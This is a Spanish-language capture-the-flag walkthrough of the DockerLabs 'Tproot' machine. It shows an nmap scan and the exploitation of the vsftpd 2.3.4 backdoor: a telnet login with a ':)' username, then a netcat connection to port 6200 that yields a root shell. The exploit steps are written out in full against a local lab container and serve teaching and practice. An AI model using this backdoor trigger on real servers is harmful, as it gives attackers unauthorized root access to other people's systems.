Tproot - DockerLabs
Hoy explotaremos la máquina Tproot de DockerLabs, de dificultad Muy Fácil. Nos aprovecharemos de una vulnerabilidad en vsftpd en una versión sin parche.
Desplegamos la máquina
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➤ sudo bash auto_deploy.sh tproot.tar
[sudo] contraseña para nmc:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Escaneo NMAP
Antes que nada, deberemos hacer un escaneo de puertos con nmap para encontrar los puertos abiertos y qué servicios corren en ellos.
1
2
3
4
5
6
7
8
9
10
11
12
➤ nmap -sV -p- --min-rate=100 -T4 172.17.0.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-17 15:11 CST
Nmap scan report for 172.17.0.2
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds
Nos percatamos de que está abierto el puerto 21 con el servicio FTP, que utiliza la versión vsftpd 2.3.4. Esta versión de vsftpd tiene una vulnerabilidad tipo backdoor que se activa cuando se introducen usuarios con “:)”. Al hacerlo, se abre una shell en el puerto 6200, permitiendo acceso remoto al sistema.
Conexión mediante Telnet y Netcat
Nos conectamos con Telnet al puerto 21 y aprovechamos la vulnerabilidad para ingresar sin necesidad de autenticación, usando los comandos: USER test:) PASS test
1
2
3
4
5
6
7
8
➤ telnet 172.17.0.2 21
Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER test:)
331 Please specify the password.
PASS test
Ponemos a escuchar netcat en el puerto 6200 e intentamos ejecutar el comando whoami.
1
2
3
➤ nc 172.17.0.2 6200
whoami
root
Acceso ROOT obtenido
¡Máquina comprometida! Te deseo un feliz hackeo.